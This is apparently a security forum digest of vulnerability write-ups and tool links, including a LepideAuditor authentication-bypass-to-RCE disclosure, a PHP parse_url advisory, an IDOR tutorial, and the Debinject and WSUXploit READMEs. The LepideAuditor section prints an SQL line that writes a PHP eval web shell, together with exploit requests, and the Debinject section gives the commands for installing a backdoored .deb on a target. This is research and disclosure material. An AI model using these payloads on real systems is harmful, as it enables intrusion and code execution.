This article focuses on a vulnerability (CVE-2017-6008) we identified in the HitmanPro standalone scan, version 3.7.15 – Build 281. This tool is part of the HitmanPro.Alert solution and has been integrated into the Sophos products as SophosClean.exe. The vulnerability was reported to Sophos in February 2017, and version 3.7.20 – Build 286 patched it in May 2017. We discovered the first crash while playing with Ioctlfuzzer [1]. Ioctlfuzzer is a great and simple tool made to fuzz I/O Request Packets (IRPs). The fuzzer hooks the DeviceIoControlFile API function and places itself as a man in the middle: for each IRP the fuzzer receives, it sends several malformed IRPs before sending the original one. The first crash occurred at the very beginning of the scan, in the initialization phase, with a BAD_POOL_HEADER bugcheck code. Before going deeper, I strongly recommend readers learn a bit more about IOCTLs and IRPs on Windows; the MSDN documentation provides a lot of the information you must know to fully understand this article. This blog post focuses on x64 architectures, since they are harder to exploit than 32-bit architectures.

Article: http://trackwatch.com/kernel-pool-overflow-exploitation-in-real-world-windows-7/
8. Description:
------------
URLs like these:

- http://example.com:80#@google.com/
- http://example.com:80?@google.com/

make parse_url return the wrong host.

https://tools.ietf.org/html/rfc3986#section-3.2
The authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URI.

This problem has been fixed in 7.1: https://github.com/php/php-src/pull/1607
But this issue should be recognized as a security issue.

Examples of impact:
- authentication bypass (verifying the hostname of a callback URL via parse_url)
- open redirector (verifying the hostname via parse_url)
- server-side request forgery (verifying the hostname via parse_url, then fetching the contents)

Test script:
---------------
php > echo parse_url("http://example.com:80#@google.com/")["host"];
google.com
php > echo parse_url("http://example.com:80?@google.com/")["host"];
google.com
php > echo file_get_contents("http://example.com:80#@google.com");
... contents of example.com ...

Expected result:
----------------
parse_url("http://example.com:80#@google.com/")["host"] should be example.com, or a parse error.

Sursa: https://cxsecurity.com/issue/WLB-2017070054
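For comparison, an RFC 3986-conformant parser terminates the authority component at the first "/", "?" or "#". Python's urllib.parse, for instance, returns the expected host for both URLs:

```python
from urllib.parse import urlsplit

# RFC 3986: the authority ends at the first "/", "?" or "#",
# so "@google.com" belongs to the fragment/query, not the host.
for url in ("http://example.com:80#@google.com/",
            "http://example.com:80?@google.com/"):
    parts = urlsplit(url)
    print(url, "->", parts.hostname)  # example.com in both cases
```

Any hostname-based allowlist built on the buggy parse_url behaviour disagrees with what an HTTP client will actually connect to, which is exactly what makes this exploitable.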
9. Google CTF 2017 – Pwnables – Inst_Prof – Writeup

Hello my friends, let me tell you a short (wrong: rather long) story. Once upon a time there was a “capture the flag” (CTF) competition held by the well known, loaded-with-smart-people company, Google. I kind of missed the announcement of that CTF and had been in Dublin for a bit of a holiday... when I saw my Twitter feed getting loaded with status updates from people who were trying to crack the various tasks. Of course I had to try this as well – and since I am a massive fan of cracking/hacking/reversing binaries, I checked out the “easy” target called “inst_prof”.

Link: https://dilsec.wordpress.com/2017/07/06/google-ctf-2017-pwnables-inst_prof-writeup/
10. Auditing the Auditor

July 5, 2017 - Exploit Development, Offensive Security, Penetration Testing

Some time ago, we noticed some security researchers looking for critical vulnerabilities affecting “security” based products (such as antivirus) that can have a damaging impact on enterprise and desktop users. Take a stroll through the Google Project Zero bug tracker to see what we mean. Other security researchers are outspoken about such products as well. The underlying point is that, on the face of it, the wider community assumes that security products are themselves secure and often doesn't comprehend the significant increase in attack surface introduced by so-called security products. Thanks to the work of security researchers, antivirus has been proven to fall short of the big enterprise giants, who already implement sandbox technologies, strong exploit mitigation technologies, and have evolving and maturing bug bounty programs. While we all love a good antivirus remote code execution vulnerability, many intelligent people are already working in that space, so we decided to begin auditing compliance-based enterprise software products. This type of software typically tries to ensure some level of security and compliance, promising high integrity to the enterprise market. Today, we’re going to discuss an interesting vulnerability that was discovered well over a year ago (Sun, 22 May 2016 at 7pm, to be exact) during the audit of one such compliance-based enterprise product: LepideAuditor Suite. This vulnerability was publicly disclosed as ZDI-17-440 and marked as a zero-day since no reply was received from the vendor. Interestingly, this vulnerability is patched in the latest version of LepideAuditor, even though there is no mention of it in the product’s release history. The product introduction states that it is designed for IT security managers and audit personnel, among others, and allows users to access real-time reports through a “secure” web portal.
Without further ado, let’s begin!

Installation

The suite consists of four components that can be installed after extracting the lepideauditorsuite.zip package. The first component we installed was the “Lepide Auditor Web Console”. The component installation is easy: with a double-click, we deployed the simple WAMP stack that Lepide provides on port 7778.

Auditing

With the application up and running, we started by looking at Process Explorer to see what was going on. We noticed that the web console is simply an Apache web server running as NT AUTHORITY/SYSTEM listening on port 7778. The properties window also displayed the current directory as C:\LepideAuditorSuiteWebConsole\apache, so this is a good place to look first. Browsing around this path in Explorer revealed something interesting: it’s our good friend PHP, and like many people, we love ourselves a good PHP target.

Authentication Bypass

Looking for some low-hanging fruit, we decided to start with a blackbox approach and spend some time poking around at the authentication mechanism. Right away, we noticed that the authentication process took a long time (around 6 seconds) to get a response from the server. We also noticed that the application asks for an extra server parameter as input during authentication, which is not normal. It turns out that the extra time taken was because Apache was performing a DNS lookup request using ‘test’. Since we did not have login credentials and could not reach much functionality without them, we moved on to auditing the PHP source code directly. The first thing we looked at was the login functionality, apparently implemented by index.php. Opening up the file revealed the following. Full disclosure: we admit we got a bit of a chuckle over this.
Whilst security through obscurity is fine for things like ASLR, it doesn’t make much sense for source code, especially using base64 as the obfuscation technique. We would at least expect a JIT obfuscation technique such as ionCube or Zend Guard. After breaking through the imposing base64 encoding, we saw the following code:

<?php
session_start();
if((isset($_SESSION["username"]))&&($_SESSION["username"]!=""))
{
    //header("location: data.php" );
    //exit();
}
?>
<?php include_once("config.php"); ?>
<?php
$error='';
if(isset($_POST["submit"]))
{
    $servername = isset($_POST["servername"])?mysql_real_escape_string($_POST["servername"]):"";
    $username = isset($_POST["username"])?mysql_real_escape_string($_POST["username"]):"";
    $password = isset($_POST["password"])?mysql_real_escape_string($_POST["password"]):"";
    if ($servername=="") {
        $error= "Please Enter Server Name";
    }
    elseif ($username=="") {
        $error= "Please Enter Username";
    }
    //elseif (strpos($username,'@')==false) {
    //    $error= 'Please Enter Valid Username';
    //}
    elseif ($username=="") {
        $error= "Please Enter Password";
    }
    if($error=="")
    {
        $port=1056;
        $sock=connect ($servername,$port);
        if($sock)
        {
            $_SESSION["socket"]=$sock;
            $data= 601; //authenticate login
            if(sendtags($_SESSION["socket"],$data)) {
                if(sendstringtoserver($_SESSION["socket"],$username)) {
                    if(sendstringtoserver($_SESSION["socket"],$password)) {
                        $recv= getstringfromserver($_SESSION["socket"]);
                        if ($recv =='_SUCCESS_') {
                            $_SESSION["username"]=$username;
                            $_SESSION["ip"]=$servername;
                            $_SESSION["password"]=$password;
                            $_SESSION["sessionno"]=rand(10,100);
                            session_write_close();
                            header("location: reports" );
                            exit();
                        }

Looking at the code, we see that it includes config.php, which, of course, also looks interesting.
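As an aside, peeling off that base64 layer is mechanical. A minimal Python sketch (the eval(base64_decode("...")) wrapper shape is an assumption for illustration; the post does not show the obfuscated file verbatim):

```python
import base64, re

def deobfuscate(php_source):
    # Decode every base64_decode("...") literal back to plain text.
    def _decode(m):
        return base64.b64decode(m.group(1)).decode("utf-8", "replace")
    return re.sub(r'base64_decode\("([A-Za-z0-9+/=]+)"\)', _decode, php_source)

payload = b'<?php echo "hi"; ?>'
obfuscated = 'eval(base64_decode("%s"));' % base64.b64encode(payload).decode()
print(deobfuscate(obfuscated))  # eval(<?php echo "hi"; ?>);
```

A one-liner with `php -r 'echo base64_decode(...);'` would do the same job; the point is that base64 offers zero protection.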
However, to begin with, the code takes user-supplied input as the server variable and, along with a hard-coded port number, passes it to the connect() function. Let’s take a look at that function within the config.php file:

function connect ($ip,$port)
{
    if (!extension_loaded('sockets')) {
        die('The sockets extension is not loaded.');
    }
    if(!($sock = socket_create(AF_INET, SOCK_STREAM, 0)))
    {
        $errorcode = socket_last_error();
        $errormsg = socket_strerror($errorcode);
        die("Couldn't create socket: [$errorcode] $errormsg \n");
    }
    if(!socket_connect($sock , $ip ,$port))
    {
        $sock= "";
        $error="could not connect";
        return $sock;
    }
    else{
        return $sock;
    }
    return $sock;
}

The code creates a raw socket connection to the supplied server parameter. Switching back to the index.php script, the code then tries to authenticate using the supplied username and password. If the remote server replies '_SUCCESS_', a valid, authenticated session is created! Since, as an attacker, we can control the authenticating server parameter, we can essentially bypass the authentication.

Gaining Remote Code Execution

Now that we could bypass the authentication, we decided to look further into the source code and see what other input is trusted from the authentication server. After spending some more time browsing around the source code, we noticed an interesting file named genratereports.php. Judging by the name, it is presumably used to generate rate reports, rather than facilitating an attacker’s access into the target.
$gid= isset($_GET["grid_id"])?$_GET["grid_id"]:'';
if(($id!=0)&&($daterange!="")&&($path!="")&&($gid==""))
{
    $port=1056;
    $sock =login($ip, $port, $username,$password);
    if($sock)
    {
        $data = 604;
        if(sendtags($sock,$data)) {
            if(sendstringtoserver($sock,$id)) {
                if(sendstringtoserver($sock,$path)) {
                    $columnamestr=getstringfromserver($sock);
                    $columname=genratecolumnname($columnamestr);
                    session_start();
                    $_SESSION["columname"]=$columname;
                    session_write_close();
                }
            }
        }
        if($columname)
        {
            $data = 603;
            if(sendtags($sock,$data)) {
                if(sendstringtoserver($sock,$daterange)) {
                    if(sendstringtoserver($sock,$id)) {
                        if(sendstringtoserver($sock,$path)) {
                            $filename=getfilefromremote($sock);
                            if($filename)
                            {
                                $restore_file = "temp/".$filename.".sql";
                                if(createdb($restore_file,$username,$sessionnumber))

It seems that we can reach the vulnerable code block as long as the $gid variable, which is populated from the grid_id GET parameter, is left empty. Next, login() is called using the username and password from our authenticated session. The login() function, defined in config.php, is essentially the same process we went through before to authenticate and set up the initial session:

function login($ip, $port, $username,$password)
{
    $sock=connect ($ip,$port);
    if($sock)
    {
        $data= 601; //authenticate login
        if(sendtags($sock,$data)) {
            if(sendstringtoserver($sock,$username)) {
                if(sendstringtoserver($sock,$password)) {
                    $recv= getstringfromserver($sock);
                    if ($recv =='_SUCCESS_') {
                        return $sock;
                        /*
                        $_SESSION["username"]=$username;
                        $_SESSION["ip"]=$servername;
                        header("location: data.php" );
                        exit();
                        */
                    }
                    else{
                        disconnect($sock);
                        destroysession();
                        //return false;
                    }
                }
            }
        }
    }
}

The difference this time is that it doesn’t set any session variables, but simply returns the socket handle.
Returning to genratereports.php: after login() returns and the socket handle is validated, some tags and strings are sent to the controlled server, and then a column name is received from the server. That column name is validated, and then, finally, we see a call to getfilefromremote(). That function looked scarily interesting to us, so we decided it merited further investigation. The getfilefromremote() function is also defined in config.php:

function getfilefromremote($sock)
{
    $uniqid=uniqid();
    $tag=readtag($sock);
    if($tag[1]==5)
    {
        $msg="";
        $buf=socket_read ($sock, 4);
        $rec_Data= unpack("N",$buf);
        if($rec_Data[1]>0)//size
        {
            $size=$rec_Data[1];
            $data_rec="";
            try
            {
                while($size>0)
                {
                    $data= socket_read($sock, $size);
                    $size=$size-strlen($data);
                    $data_rec.=$data;
                }
            }
            catch (Exception $e)
            {
                echo 'Caught exception: ', $e->getMessage(), "\n";
            }
            $data = iconv('UTF-16LE','UTF-8',$data_rec);
            $fp = fopen("temp/".$uniqid.".sql","wb");
            fwrite($fp,$data);
            fclose($fp);
            $ack=2;
            if(socket_send ( $sock , pack('N*',$ack), strlen(pack('N*',$ack)) , 0))
            {
                if($rec_ack=readtag($sock))
                {
                    if($rec_ack[1]==2)
                    {
                        //socket_close($sock);
                        return $uniqid;
                    }
                }
            }
        }
    }
}

The function reads data from our controlled server and copies it into a temporary file whose name is generated with uniqid(). Finally, the code returns that uniqid. Going back to genratereports.php, we can see the $restore_file variable is mapped to the same path as the file that was created in getfilefromremote(). That variable is then passed to the createdb() function.
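In short, getfilefromremote() expects a 4-byte big-endian length (PHP's unpack("N")) followed by UTF-16LE file data. A hedged Python sketch of how a malicious server could frame its payload (the surrounding readtag()/ack handshake is omitted, since its implementation is not shown in the post):

```python
import struct

def frame_payload(sql_text):
    """Frame attacker-controlled SQL the way getfilefromremote() reads it:
    a 4-byte big-endian byte count (PHP's unpack("N")), then the data in
    UTF-16LE, which PHP converts back via iconv('UTF-16LE','UTF-8',...)."""
    data = sql_text.encode("utf-16-le")
    return struct.pack(">I", len(data)) + data

msg = frame_payload("select 1;")
size = struct.unpack(">I", msg[:4])[0]  # what PHP's unpack("N") would see
```

Whatever text is framed this way ends up verbatim in temp/<uniqid>.sql on the target.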
Let’s investigate createdb() within, once again, config.php:

function createdb($dbfile,$Dusername,$sessionnumber)
{
    $dbcreate= false;
    ini_set('max_execution_time', 300); //300 seconds = 5 minutes
    $server_name= "localhost";
    $username= "root";
    $password= "";
    $dbname= substr(preg_replace("/[^a-z]+/", "", $Dusername), 0, 12);
    $dbname= $dbname.$sessionnumber;
    $link = mysql_connect($server_name, $username, $password);
    if ($link)
    {
        $user=substr(preg_replace("/[^a-z]+/", "", $Dusername), 0, 12);
        //$user=$user.sessionno
        $host="localhost";
        $pass= "123456";
        $userQ= "DROP USER ".$user."@localhost";
        $createQ = "CREATE USER '{$user}'@'{$host}' IDENTIFIED BY '{$pass}'";
        $grantQ = "GRANT ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE USER, CREATE VIEW, DELETE, DROP, EVENT, EXECUTE, FILE, INDEX, INSERT, LOCK TABLES, PROCESS, REFERENCES, RELOAD, REPLICATION CLIENT, REPLICATION SLAVE, SELECT, SHOW DATABASES, SHOW VIEW, SHUTDOWN, SUPER, TRIGGER, UPDATE ON *.* TO '{$user}'@'{$host}' WITH GRANT OPTION";
        mysql_query($userQ);
        if(mysql_query($createQ)){
            if(mysql_query($grantQ)){
                $dropdbQ ='DROP DATABASE IF EXISTS '.$dbname;
                mysql_query($dropdbQ, $link);
                $sql = 'CREATE DATABASE IF NOT EXISTS '.$dbname;
                mysql_query($sql, $link);
                $cmd = "mysql -h {$host} -u {$user} -p{$pass} {$dbname} < $dbfile";
                exec($cmd,$output,$return);

The createdb() function attempts to create a new, highly privileged database user account and interpolates the supplied $restore_file variable into a command line that is passed to exec(). On the surface, this looks like a command execution vulnerability; however, since we do not fully or even partially control the filename directly (just its contents), we cannot execute commands that way. The astute reader has probably put it all together by now: we can control the input passed to the MySQL client, running with root-level database privileges, using attacker-controlled SQL.
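Note how the database name and user are derived from the supplied username: everything except lowercase letters is stripped, and the result is truncated to 12 characters. A quick Python equivalent of that PHP filter (the helper name is mine):

```python
import re

def lepide_dbuser(username, sessionnumber):
    """Mirror PHP's substr(preg_replace("/[^a-z]+/","",$Dusername),0,12):
    keep only lowercase letters and truncate to 12 characters; the
    database name additionally gets the session number appended."""
    user = re.sub(r"[^a-z]+", "", username)[:12]
    return user, user + str(sessionnumber)

# e.g. lepide_dbuser("Test-User42", 17) -> ("estser", "estser17")
```

This filter keeps the username out of the shell command, which is why the injection has to travel through the file contents instead.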
At this point, we can do something like the following:

# exploit!
if send_file(conn, "select '<?php eval($_GET[e]); ?>' into outfile '../../www/offsec.php';"):

Exploitation

This was simple enough. All we had to do was create a socket server that interacted with the target and supplied what it needed, when it needed it. In one window, we set up the malicious server:

root@kali:~# ./server-poc.py
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution
by mr_me 2016
(+) waiting for the target...

We then used a client to send the first login request, followed by a second request to the genratereports.php file:

root@kali:~# ./client-poc.py 172.16.175.137 172.16.175.1
(+) sending auth bypass
(+) sending code execution request

The first request just performs the login against our attacker-controlled server:

POST /index.php HTTP/1.1
Host: 172.16.175.137:7778
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

servername=172.16.175.1&username=test&password=hacked&submit=

We get a response that contains an authenticated PHPSESSID. We must take care not to follow the redirect, or our PHPSESSID will be destroyed (code omitted):

HTTP/1.1 302 Found
Date: Sun, 22 May 2016 19:00:20 GMT
Server: Apache/2.4.12 (Win32) PHP/5.4.10
X-Powered-By: PHP/5.4.10
Set-Cookie: PHPSESSID=lkhf0n8epc481oeq4saaesgqe3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: reports
Content-Length: 8
Content-Type: text/html

The second request triggers the exec() call using our newly-authenticated PHPSESSID:

GET /genratereports.php?path=lol&daterange=1@9&id=6 HTTP/1.1
Host: 172.16.175.137:7778
Cookie: PHPSESSID=lkhf0n8epc481oeq4saaesgqe3

Finally, all the pieces come together...

root@kali:~# ./server-poc.py
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution
by mr_me 2016
(+) waiting for the target...
(+) connected by ('172.16.175.137', 50541)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) connected by ('172.16.175.137', 50542)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) got a column request
(+) got http request id: 6
(+) got http request path: lol
(+) send string successful
(+) got a filename request
(+) got http request daterange: 1@9 - 23:59:59
(+) got http request id: 6
(+) got http request path: lol
(+) successfully sent tag
(+) successfully sent file!
(+) file sent successfully
(+) done: http://172.16.175.137:7778/offsec.php?e=phpinfo();

That’s unauthenticated remote code execution as NT AUTHORITY/SYSTEM. It’s also interesting to note that Lepide ships an old version of PHP!

Conclusion

Currently, a great deal of focus is applied to input validation vulnerabilities such as SQL injection or PHP code injection, but the complete security model of this application is destroyed by trusting the client to supply the authentication server. Disastrous logic vulnerabilities such as these can be avoided if the trust chain is validated before deployment. This is a vulnerability that would never have been found via a blackbox approach. Last year, during our Advanced Web Attacks and Exploitation (AWAE) course at Black Hat, we guided the students’ focus away from the ‘traditional’ black-box web application penetration test to a more involved white-box / grey-box research approach. The threat landscape is changing, and skilled web application bug hunters are everywhere due to the explosion of service-oriented bug bounties provided by companies large and small. On the other hand, product-oriented bug bounties require auditors to understand application logic and code even more than a service-oriented bounty hunter does.
In order for security analysts to progress, they will need the ability to audit source code at a detailed level in the ongoing quest to discover zero-days.

References:
http://www.zerodayinitiative.com/advisories/ZDI-17-440/

Sursa: https://www.offensive-security.com/vulndev/auditing-the-auditor/
11. [DEBINJECT]

Copyright 2017 Debinject
Written by: Alisson Moretto - 4w4k3 - UndeadSec

TOOL DESIGNED FOR GOOD PURPOSES, PENTESTS. DON'T BE A CRIMINAL!
Only download it here, do not trust other places.

CLONE
git clone https://github.com/UndeadSec/Debinject.git

RUNNING
cd Debinject
python debinject.py

If you have another version of Python:
python2.7 debinject.py

RUN ON TARGET SIDE
chmod 755 default.deb
dpkg -i backdoored.deb

DISCLAIMER
"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." Taken from LICENSE.

PREREQUISITES
dpkg
dpkg-deb
metasploit

TESTED ON
Kali Linux - SANA
Kali Linux - ROLLING

SCREENSHOT
More in Screens

CONTRIBUTE
Send me more features if you want; I need your help to make it better.

LICENSE
This project is licensed under the BSD-3-Clause license - see the LICENSE file for details.

Sursa: https://github.com/UndeadSec/Debinject
12. filewatcher - a simple auditing utility for macOS

Filewatcher is an auditing and monitoring utility for macOS. It can audit all events from the system auditpipe of macOS and filter them by process or by file. You can use this utility to:

- Monitor access to a file, or a group of files.
- Monitor the activity of a process, and which resources are accessed by that process.
- Build a small host-based IDS by monitoring access or modifications to specific files.
- Do dynamic malware analysis by monitoring what the malware uses on the filesystem.

If you want to read more about how it works, check my blog.

Installation
Just run make to compile it, then ./bin/filewatcher.

Usage: ./bin/filewatcher [OPTIONS]
-f, --file      Set a file to filter
-p, --process   Set a process name to filter
-a, --all       Display all events (by default only basic events like open/read/write are displayed)
-d, --debug     Enable debugging messages to be saved into a file
-h, --help      Print this help and exit

Expected output:

Sursa: https://github.com/m3liot/filewatcher
  13. Abstract—We present the password reset MitM (PRMitM) attack and show how it can be used to take over user accounts. The PRMitM attack exploits the similarity of the registration and password reset processes to launch a man in the middle (MitM) attack at the application level. The attacker initiates a password reset process with a website and forwards every challenge to the victim who either wishes to register in the attacking site or to access a particular resource on it. The attack has several variants, including exploitation of a password reset process that relies on the victim’s mobile phone, using either SMS or phone call. We evaluated the PRMitM attacks on Google and Facebook users in several experiments, and found that their password reset process is vulnerable to the PRMitM attack. Other websites and some popular mobile applications are vulnerable as well. Although solutions seem trivial in some cases, our experiments show that the straightforward solutions are not as effective as expected. We designed and evaluated two secure password reset processes and evaluated them on users of Google and Facebook. Our results indicate a significant improvement in the security. Since millions of accounts are currently vulnerable to the PRMitM attack, we also present a list of recommendations for implementing and auditing the password reset process. Download: https://www.ieee-security.org/TC/SP2017/papers/207.pdf
14. Resources

- KeenLab's MOSEC 2017 iOS 10 Kernel Security Presentation is Now UP!
- OASP
- Pangu 9 Internals
- Hacking from iOS 8 to iOS 9
- Analysis of iOS 9.3.3 Jailbreak & Security Enhancements of iOS 10
- iOS Kernel Vulnerability Discovery - Fuzzing & Code Audit (iOS内核漏洞挖掘-Fuzz & 代码审计)
- The Userland Exploits of Pangu 8 (CanSecWest)
- Improving Mac OS X Security Through Gray Box Fuzzing Technique
- OS X Kernel is As Strong as its Weakest Part
- Optimized Fuzzing IOKit in iOS
- Pangu 9.3 (女娲石)
- Don't Trust Your Eye: Apple Graphics Is Compromised! (CanSecWest) - Liang Chen
- Hack in the (sand)Box - Jonathan Levin (Video, PDF)
- The ARMs race to TrustZone - Jonathan Levin (Video, PDF)
- iOS 10 - Kernel Heap Revisited - Stefan Esser (Video, PDF)
- iOS Kernel Exploitation - Stefan Esser (Video, PDF)

Link: https://github.com/aozhimin/MOSEC-2017
15. Beginner Guide to Insecure Direct Object References (IDOR)

posted in Penetration Testing, Website Hacking on July 4, 2017 by Raj Chandel

Insecure Direct Object References (IDOR) has been placed fourth on the OWASP Top 10 list of web application security risks since 2013. It allows an authorized user to obtain information belonging to other users, and can be present in any type of web application. Basically, it allows requests to be made for specific objects through pages or services without proper verification of the requester's right to the content.

OWASP definition: Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user-supplied input and uses it to retrieve an object without performing sufficient authorization checks.

The application uses untested data in a SQL call that accesses account information. Let's consider a scenario where a web application allows the logged-in user to change his secret value. Here you can see that the secret value must refer to some user account in the database. Currently, user bee is logged into the web server to change his secret value, but he wants to perform a mischievous action that will change the secret value of another user. Using Burp Suite, we captured the browser request; as you can see in the given image, the logged-in user is bee and the secret value is hello. Now we manipulate the username into another user's.

SQLquery = “SELECT * FROM useraccounts WHERE account = ‘bee’;

Now let’s change the username to raj as shown in the given image. To perform this attack, the application requires at least two user accounts.

SQLquery = “SELECT * FROM useraccounts WHERE account = ‘raj’;

Great!!! We have successfully changed the secret value for raj.
Note: on a real website, the attacker would replace a user account with an admin account. Let's take another scenario that looks quite familiar for most IDOR attacks. We often place orders online through web applications, for example bookmyshow.com for movie ticket booking. Consider the same scenario in bWAPP for movie ticket booking, where I booked 10 tickets at 15 EUR each. Now let's confirm it and capture the browser request with Burp Suite. You can see we have intercepted the request where the highlighted text contains the number of tickets and the price of one ticket, i.e. 15 EUR, which means 150 EUR will be deducted from my (user) account; now manipulate this price to your desired value. I changed it to 1 EUR, which means only 10 EUR will now be deducted from the account, as you can observe in the given image; then forward the request. Awesome!!! We booked the 10 tickets for only 10 EUR.

Author: Aarti Singh is a researcher and technical writer at Hacking Articles, an information security consultant, social media lover and gadget enthusiast. Contact here.

Sursa: http://www.hackingarticles.in/beginner-guide-insecure-direct-object-references/
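Both scenarios share the same root cause: the server trusts a client-supplied object reference and price. A minimal sketch of the server-side fix (all names here are hypothetical, for illustration): verify object ownership and recompute the price from server state instead of the request body:

```python
# Hypothetical server-side state: the canonical ticket price and
# which session owns which account.
TICKET_PRICE_EUR = 15
ACCOUNT_OWNER = {"bee": "session-bee", "raj": "session-raj"}

def checkout(session_id, account, tickets):
    """Reject requests for objects the session does not own, and
    recompute the price on the server instead of trusting the client."""
    if ACCOUNT_OWNER.get(account) != session_id:
        raise PermissionError("account does not belong to this session")
    return tickets * TICKET_PRICE_EUR

print(checkout("session-bee", "bee", 10))  # 150
```

With this shape, tampering with the account name or the per-ticket price in the intercepted request has no effect, because neither is read from the client.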
16. ARM Exploitation: Return Oriented Programming on ARM

Slides: https://docs.google.com/viewer?url=dl.dropbox.com%2Fu%2F2595211%2FROP_ARMEXP.pdf
17. Published on Jul 5, 2017

Live workshop walkthrough for the TI addr_limit bug. Using syscalls in the kernel (or simply forgetting to reset the addr_limit value before returning to user space) may lead to this type of bug. We're using a stack info leak together with the buggy get_fs/set_fs code to overwrite the (e)uid and (e)gid of the current process and elevate privileges.
@tjt "Why wouldn't they pay you?" - If you had your own company, would you pay 5000 RON to someone who hasn't worked a single day on what you need? Even if the person has read a few things, if they haven't worked for at least 1-2 years on what the job requires, they won't compare to someone who has. For example, when I got hired as a C++ developer 6 years ago, I knew the language extremely well. But guess what, that wasn't quite enough. I hadn't worked with sockets, multi-threading, STL, semaphores and who knows what else, whereas someone with experience had probably touched at least some of them. I don't think anyone who hasn't worked at a company on a specific thing, whatever it may be, has spent a few hours almost every day developing those skills. Another example: before my first job I wanted to work as a PHP developer. I had written over 20,000 lines of code and had some projects, BUT: I had never written MVC code (obviously), never worked with OOP (small projects, obviously), never used any framework (same). So why would they pay me 5000 RON a month when I would have had to spend months learning how those things are properly done? "someone who invested personal time and even money to improve their knowledge, to obtain certifications" - Nobody invests enough personal time to be as good as someone who has done that thing 8 hours a day for 1-2 years. And nobody will. Reading an article every day, or a book now and then, is fine, it shows enthusiasm and that matters a lot, but it's not enough. Put yourself in the employer's shoes. As for HR, or "professional LinkedIn browsers", unfortunately they don't have the capacity to look past certain things or to understand certain things. You will always run into problems with them, and you can lose good jobs because they may decide that "he has no IT degree, so he can't work in security", since they don't understand that, for example, no university degree for that even exists.
@Philip.J.Fry I don't know whether it's RON or EUR; I doubt it's EUR in Romania. Yes, the diploma shouldn't matter, since I don't know anyone in Romania who graduated from a Faculty of Reverse Engineering and Malware Analysis, but without experience it seems hard to believe. I mean, seriously, would you pay 3.7 (EUR) a month in Romania to someone who probably has some technical knowledge picked up in their free time, instead of someone who has done this for months at some company that builds antivirus software? @gigiRoman About 4 years ago I also interviewed at Avira for a C++ developer position. I had to build a client-server, multithreaded application with who knows what other functionality, in 3 hours. I did it and it worked very well; the people there said most candidates don't finish it within the 3 hours. Then we had a technical discussion. All fine and dandy, until we got to talking about antivirus. I told them I had written a crypter, a program that takes a detectable file and makes it undetectable. They said "that's impossible, our antivirus catches it". I explained how it works and why it wouldn't be caught, that it loads itself in memory and so on, but they didn't seem to get it. Then they asked me: "Why would we hire you? How do we know that, with access to the antivirus source code, you wouldn't keep developing such things?". I started laughing and told them I don't need the source code to do that. They never contacted me again. So, as a general idea, which I also ran into about 6 years ago when I got hired at 1600 RON: do NOT expect employers to throw money at you, because they have no reason to. Besides, you are not the only people looking for a job in IT. Although there are plenty of jobs, a lot of people apply for the entry-level positions. Also, I would assume that if someone works on a project in their personal time, or builds something in order to learn, they might post it here too. I haven't seen such things posted in years.
I was a young student once too, and what do you think I preferred: sitting down to write code, or drinking until I dropped?
19. If you have no work experience or at least personal projects, anything at all, nobody will pay you 5000 RON. But from there, the salary can grow quite a lot.
20. WSUXploit

Written by Marcio Almeida to weaponize the use of WSUSpect Proxy, created by Paul Stone and Alex Chapman in 2015 and publicly released by Context Information Security.

Summary
This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to the public in the Black Hat USA 2015 presentation, 'WSUSpect – Compromising the Windows Enterprise via Windows Update'.

Please read the white paper and the presentation slides listed below:
White paper: http://www.contextis.com/documents/161/CTX_WSUSpect_White_Paper.pdf
Slides: http://www.contextis.com/documents/162/WSUSpect_Presentation.pdf

Sursa: https://github.com/pimps/wsuxploit
  21. How I found a bug in Intel Skylake processors July 3, 2017 By Xavier Leroy Instructors of "Introduction to programming" courses know that students are willing to blame the failures of their programs on anything. Sorting routine discards half of the data? "That might be a Windows virus!" Binary search always fails? "The Java compiler is acting funny today!" More experienced programmers know very well that the bug is generally in their code: occasionally in third-party libraries; very rarely in system libraries; exceedingly rarely in the compiler; and never in the processor. That's what I thought too, until recently. Here is how I ran into a bug in Intel Skylake processors while trying to debug mysterious OCaml failures. The first sighting Late April 2016, shortly after OCaml 4.03.0 was released, a Serious Industrial OCaml User (SIOU) contacted me privately with bad news: one of their applications, written in OCaml and compiled with OCaml 4.03.0, was crashing randomly. Not at every run, but once in a while it would segfault, at different places within the code. Moreover, the crashes were only observed on their most recent computers, those running Intel Skylake processors. (Skylake is the nickname for what was the latest generation of Intel processors at the time. The latest generation at the time of this writing is nicknamed Kaby Lake.) Many OCaml bugs have been reported to me in the last 25 years, but this report was particularly troubling. Why Skylake processors only? Indeed, I couldn't reproduce the crashes using SIOU's binary on my computers at Inria, which were all running older Intel processors. Why the lack of reproducibility? SIOU's application was single-threaded and made no network I/O, only file I/O, so its execution should have been perfectly deterministic, and whatever bug caused the segfault should cause it at every run and at the same place in the code. My first guess was flaky hardware at SIOU: a bad memory chip? overheating? 
